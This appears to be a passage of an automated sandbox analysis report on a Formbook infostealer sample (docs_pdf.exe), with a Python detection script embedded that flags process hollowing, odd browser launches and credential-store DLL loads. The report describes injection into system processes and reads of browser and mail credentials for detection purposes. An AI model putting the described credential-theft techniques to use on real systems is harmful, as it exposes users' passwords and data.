Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04927571
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049216CC
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048B5630
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492F7B0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048770C0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0491F0CC
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492F0E0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049270E9
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0487B1B0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048A516C
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0485F172
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0493B16B
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048752A0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0488B2C0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_049112ED
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048B739A
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492132D
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0485D34C
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492FCF2
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048E9C32
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0488FDC0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04873D40
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04921D5A
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04927D73
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04879EB0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04871F92
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492FFB1
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04833FD2
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04833FD5
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492FF09
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048738E0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048DD800
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04905910
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04879950
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0488B950
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048B5AA0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04911AA3
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0490DAAC
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0491DAC6
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_04927A46
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492FA49
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048E3A6C
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0488FB80
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048ADBF9
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_048E5BF0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0492FB76
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_008119E0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0082A5A0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0080CBC0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0080CDE0
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0080AE60
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_008011A1
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0081352C
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_00813530
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0468C07D
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0468B0E8
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0468A3A9
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0468BCE8
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: 5_2_0468BBC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03787E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 037AEA12 appears 86 times
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: String function: 000F7F41 appears 35 times
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: String function: 00110D27 appears 70 times
Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: String function: 00118B40 appears 42 times
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: String function: 048EF290 appears 105 times
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: String function: 0485B970 appears 280 times
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: String function: 048B7E54 appears 111 times
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: String function: 048DEA12 appears 86 times
Source: C:\Windows\SysWOW64\isoburn.exe | Code function: String function: 048A5130 appears 58 times
Source: docs_pdf.exe, 00000000.00000003.2098029942.0000000003D03000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
Source: docs_pdf.exe, 00000000.00000003.2098263336.0000000003EAD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs docs_pdf.exe
Source: docs_pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4549278763.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2491417008.0000000003680000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2491132736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4553969990.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4549521621.0000000000AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4549572273.0000000000B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4551015645.0000000003690000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2492038976.0000000004550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@16/10
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015A2D5 GetLastError,FormatMessageW,0_2_0015A2D5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148713 AdjustTokenPrivileges,CloseHandle,0_2_00148713
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00148CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00148CC3
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0015B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0015B59E
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0016F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_0016F121
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0015C602 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0015C602
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_000F4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_000F4FE9
            Source: C:\Users\user\Desktop\docs_pdf.exe | File created: C:\Users\user\AppData\Local\Temp\autD7A1.tmp
            Source: C:\Users\user\Desktop\docs_pdf.exe | Command line argument: P 0_2_000F492E (2 occurrences)
            Source: docs_pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\docs_pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: isoburn.exe, 00000005.00000003.2670309488.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2668810473.0000000000C42000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2668668394.0000000000C21000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4549871592.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4549871592.0000000000C42000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: docs_pdf.exe | ReversingLabs: Detection: 65%
            Source: unknown | Process created: C:\Users\user\Desktop\docs_pdf.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\docs_pdf.exe"
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Process created: C:\Windows\SysWOW64\isoburn.exe "C:\Windows\SysWOW64\isoburn.exe"
            Source: C:\Windows\SysWOW64\isoburn.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\docs_pdf.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\isoburn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: C:\Windows\SysWOW64\isoburn.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
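The process-creation and section-loaded rows above describe a chain a detection engineer can encode as rules: svchost.exe started by an executable on the Desktop with a command line that names a different image (the hollowing pattern), a system utility (isoburn.exe) launching a browser, and that same utility loading the DLLs used to read stored credentials (winsqlite3.dll, vaultcli.dll, dpapi.dll), followed by the Firefox profiles.ini read and the Outlook profile key open. The following Python is an added example written for this page, not Joe Sandbox code: the events are constructed from the rows above, the PIDs, the explorer.exe parent of docs_pdf.exe and the services.exe baseline row are assumptions, and the parent and loader allowlists are illustrative rather than complete.

```python
"""Process-tree and image-load rules for the chain reported above.

Added example for this page, not Joe Sandbox code. Events are constructed
from the report rows; PIDs, the explorer.exe parent of docs_pdf.exe and the
services.exe baseline row are assumptions.
"""
from collections import defaultdict
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # image path of the new process
    cmdline: str        # command line it was created with
    parent_pid: int
    parent_image: str


@dataclass(frozen=True)
class LoadEvent:
    pid: int
    dll: str


BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
BROWSER_PARENTS = BROWSERS | {"explorer.exe"}      # assumption: normal launchers
CRED_DLLS = {"winsqlite3.dll", "vaultcli.dll", "dpapi.dll"}
CRED_DLL_USERS = BROWSERS | {"outlook.exe"}        # assumption: expected loaders


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def cmdline_image(cmdline: str) -> str:
    """First token of a Windows command line, honouring a quoted image path."""
    c = cmdline.strip()
    if c.startswith('"'):
        end = c.find('"', 1)
        return c[1:end] if end > 0 else c[1:]
    return c.split(" ", 1)[0]


def analyze(procs, loads):
    """Return (pid, rule, detail) findings; the rule names are this example's own."""
    loaded = defaultdict(set)
    for ev in loads:
        loaded[ev.pid].add(ev.dll.lower())
    findings = []
    for p in procs:
        img, parent = base(p.image), base(p.parent_image)
        claimed = base(cmdline_image(p.cmdline))
        # Image on disk differs from the image named on the command line:
        # the classic sign of a hollowed / replaced process.
        if claimed and claimed != img:
            findings.append((p.pid, "cmdline_mismatch", f"{img} started as {claimed}"))
        # Genuine svchost.exe instances are children of services.exe.
        if img == "svchost.exe" and parent != "services.exe":
            findings.append((p.pid, "svchost_parent", parent))
        # A browser launched by something other than the shell or itself.
        if img in BROWSERS and parent not in BROWSER_PARENTS:
            findings.append((p.pid, "browser_parent", parent))
        # Credential-store DLLs loaded by a process with no business using them.
        hit = CRED_DLLS & loaded[p.pid]
        if len(hit) >= 2 and img not in CRED_DLL_USERS:
            findings.append((p.pid, "cred_dll", ",".join(sorted(hit))))
    return findings


# Constructed from the process-creation and section-loaded rows of this report.
PROCS = [
    ProcEvent(4404, r"C:\Users\user\Desktop\docs_pdf.exe",
              r'"C:\Users\user\Desktop\docs_pdf.exe"', 2912, r"C:\Windows\explorer.exe"),
    ProcEvent(5120, r"C:\Windows\SysWOW64\svchost.exe",
              r'"C:\Users\user\Desktop\docs_pdf.exe"', 4404, r"C:\Users\user\Desktop\docs_pdf.exe"),
    ProcEvent(6208, r"C:\Windows\SysWOW64\isoburn.exe",
              r'"C:\Windows\SysWOW64\isoburn.exe"', 6100,
              r"C:\Program Files (x86)\JQZieOSbaUIVYINXlpesTIPdKuZxBeJrwziBncLormJlccPJC\HDtHilbfKZE.exe"),
    ProcEvent(6300, r"C:\Program Files\Mozilla Firefox\firefox.exe",
              r'"C:\Program Files\Mozilla Firefox\Firefox.exe"', 6208, r"C:\Windows\SysWOW64\isoburn.exe"),
    ProcEvent(900, r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\svchost.exe -k netsvcs", 700, r"C:\Windows\System32\services.exe"),
]
LOADS = [LoadEvent(6208, d) for d in ("winsqlite3.dll", "vaultcli.dll", "dpapi.dll")]

if __name__ == "__main__":
    for pid, rule, detail in analyze(PROCS, LOADS):
        print(f"pid {pid}: {rule}: {detail}")
```

Note that the firefox.exe row passes the command-line check only because both sides are lower-cased: the report shows the image as firefox.exe but the command line as Firefox.exe, and a case-sensitive comparison would raise a false alert there.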
            Source: docs_pdf.exe | Static file information: File size 1193984 > 1048576
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: docs_pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: isoburn.pdb source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: isoburn.pdbGCTL source: svchost.exe, 00000002.00000003.2460271834.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460332566.0000000003034000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000003.2430278443.000000000104B000.00000004.00000020.00020000.00000000.sdmp, HDtHilbfKZE.exe, 00000004.00000002.4550345852.0000000001064000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDtHilbfKZE.exe, 00000004.00000000.2413958648.000000000008E000.00000002.00000001.01000000.00000005.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2554531949.000000000008E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: docs_pdf.exe, 00000000.00000003.2097373194.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, docs_pdf.exe, 00000000.00000003.2103113163.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2491458027.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2491458027.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2403405622.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2401985926.0000000003300000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, isoburn.exe, 00000005.00000002.4551471544.00000000049CE000.00000040.00001000.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2493801369.0000000004684000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000003.2491393754.00000000044D9000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4551471544.0000000004830000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: isoburn.exe, 00000005.00000002.4549871592.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, isoburn.exe, 00000005.00000002.4553311671.0000000004E5C000.00000004.10000000.00040000.00000000.sdmp, HDtHilbfKZE.exe, 00000007.00000000.2555156693.0000000002DDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2774571608.0000000038CBC000.00000004.80000000.00040000.00000000.sdmp
            Source: docs_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: docs_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: docs_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: docs_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: docs_pdf.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_0016C304 LoadLibraryA,GetProcAddress, 0_2_0016C304
            Source: C:\Users\user\Desktop\docs_pdf.exe | Code function: 0_2_00118B85 push ecx; ret 0_2_00118B98
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041905C push 72B82297h; ret 2_2_004190E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00408028 pushfd ; retf 2_2_00408034
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00419151 push ecx; iretd 2_2_00419152
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004089B6 push ecx; retf 2_2_004089C2
